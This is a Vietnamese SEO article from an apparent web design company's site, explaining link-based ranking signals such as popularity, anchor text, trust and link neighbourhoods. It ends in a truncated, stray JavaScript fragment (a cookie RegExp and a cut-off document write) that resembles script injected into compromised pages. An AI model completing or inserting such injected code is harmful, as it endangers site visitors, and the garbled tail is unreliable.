Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Dấu hiệu links trong phân tích Website

Dấu hiệu links trong phân tích Website

Đối với các bộ máy tìm kiếm thu thập dữ liệu trên web, liên kết là con đường kết nối giữa các website. Sử dụng công cụ  phân tích các liên kết, bộ máy tìm kiếm có thể tìm hiểu các. 
website liên kết với nhau như thế nào và bằng cách nào. Kể từ cuối những năm 1990, các liên kết đã được coi như vai trò quyết định website nào quan trọng và được ưa chuộng. Các bộ máy tìm kiếm tự chúng biến các ứng dụng dữ liệu trong link thành một tác phẩm nghệ thuật, rồi sử dụng các thuật toán phức tạp để đánh giá sắc thái của trang dựa trên những thông tin đó.

thiết kế website

SEO chuyên nghiệp đóng góp 1 tỷ lệ đáng kể từ các thuật toán của bộ máy tìm kiếm cho tới các yếu tố đánh giá. Thông qua các liên kết, công cụ phân tích độ phổ biến của một trang website dựa trên các số lượng và độ phổ biến của trang kết nối tới chúng, cũng như các yếu tố khác ví dụ như: độ tin cậy, spam, và mức  uy tín. Các trang web đáng tin cậy có xu hướng liên kết tới các web đáng tin cậy khác, trong khi các sites bị spam nhận được rất ít các links từ các nguồn đáng tin cậy. Các mô hình uy tín, được mặc nhiên công nhận trong các thuật toán Hilltop, gợi ý rằng các liên kết là một cách rất hữu hiệu để nhận diện các nội dung có độ tin cậy cao trong một môi trường cho trước. 

dịch vụ seo

Sử dụng bởi các công cụ tìm kiếm

Trước khi bắt đầu xây dựng một link, cần hiểu các yếu tố của một liên kết được sử dụng bởi các công cụ tìm kiếm cũng như các yếu tố đó ảnh hưởng như thế nào đối với đánh giá link trong các thuật toán tìm kiếm. Chúng tôi không thể biết hết tất cả các thuộc tính đánh giá bởi các công cụ tìm kiếm, tuy nhiên thông qua việc phân tích một số ứng dụng và các báo cáo tại hội thảo liên quan tới việc thu thập thông tin, cộng với kinh nghiệm và thử nghiệm, chúng ta có thể rút ra một số giả định khôn ngoan. Dưới đây là danh sách các yếu tố đáng chú ý và xem xét. Tất cả các vấn đề này, và nhiều hơn nữa, đều được xem xét kỹ lưỡng bởi các chuyên gia SEO khi đo lường giá trị của link và thông tin về links của một site.

Độ phổ biến toàn cầu.

Một site càng quan trọng và càng được ưa thích- phổ biến thì links từ site đó càng tác động tới các công cụ tìm kiếm. Nhận được nhiều liên kết nội địa, có chủ đề cụ thể thì rất tốt, nhưng đồng thời để tìm kiếm được sự tin cậy và uy tín với các công cụ tìm kiếm thì bạn cũng cần sự giúp đỡ của các đối tác có ảnh hưởng lớn.

Độ phổ biến ở một lĩnh vực cụ thể/ “local”.

Khái niệm sự phổ biến “ở một lĩnh vực cụ thể (Local)” (được đưa ra đầu tiên bởi công cụ tìm kiếm Teoma) cho rằng các links từ các site cùng trong một lĩnh vực cụ thể thì có nhiều ảnh hưởng hơn là links từ các sites chung chung có nội dung khác.

Anchor text.

Một trong những tín hiệu mạnh nhất được công cụ bảng xếp hạng sử dụng là “anchor text”. Nếu có hàng chục các liên kết trỏ đến một trang với cùng từ khoá trang đó có khả năng cao để đạt thứ hạng tốt cho cụm từ hướng đến trong “anchor text”. Bạn có thể xem các ví dụ liên quan với các tìm kiếm như “click here” và “leave”, những vị trí mà kết quả xếp hạng chỉ dựa vào “anchor text” của links bên trong.

 Xếp hạng tin cậy

Để loại bỏ số lượng khổng lồ spam (gần như 60% số trang web), các công cụ tìm kiếm sử dụng hệ thống để đo lường độ tin cậy, dựa chủ yếu vào đồ thị link. Đặt được link tại các domain có độ tin cậy cao có thể làm tăng nhanh gía trị các biến xếp hạng.

Vùng liên kết lân cận

blog

Trong rất nhiều tài liệu về phát hiện spam và lấy thông tin, việc sử dụng các sites link tới một domain cũng như các site mà domain links tới có vai trò quan trọng trong việc phát hiện và lọc spam. Vì thế, cần cẩn thận lựa chon những sites bạn link tới cũng như các site bạn cố gắng đặt links  ở đó.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘